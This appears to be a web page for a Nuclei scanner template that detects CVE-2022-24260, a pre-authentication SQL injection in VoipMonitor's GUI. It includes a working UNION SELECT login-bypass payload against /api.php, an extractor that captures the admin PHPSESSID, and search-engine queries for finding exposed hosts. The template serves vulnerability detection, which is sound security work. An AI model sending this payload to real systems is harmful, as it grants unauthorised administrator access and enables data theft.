Skip to content

VoipMonitor - Pre-Auth SQL Injection

ID: CVE-2022-24260

Severity: critical

Author: gy741

Tags: cve,cve2022,voipmonitor,sqli,unauth

A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.

id: CVE-2022-24260
info:
name: VoipMonitor - Pre-Auth SQL Injection
author: gy741
severity: critical
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application.
reference:
- https://kerbit.io/research/read/blog/3
- https://nvd.nist.gov/vuln/detail/CVE-2022-24260
- https://www.voipmonitor.org/changelog-gui?major=5
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24260
cwe-id: CWE-89
epss-score: 0.25256
epss-percentile: 0.96681
cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: voipmonitor
product: voipmonitor
shodan-query:
- http.title:"VoIPmonitor"
- http.title:"voipmonitor"
fofa-query: title="voipmonitor"
google-query: intitle:"voipmonitor"
tags: cve,cve2022,voipmonitor,sqli,unauth
http:
- raw:
- |
POST /api.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
matchers-condition: and
matchers:
- type: word
words:
- '"success":true'
- '_vm_version'
- '_debug'
condition: and
- type: status
status:
- 200
extractors:
- type: kval
kval:
- PHPSESSID
# digest: 4a0a00473045022006c77efd465607420adb08919ae0a586ccb1ac96d86f6751cbe6323cc14893bf022100acc6dc38d97206b8d083cb93948a1ed80745169af9cfcc456c558528d8505647:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24260.yaml"

View on Github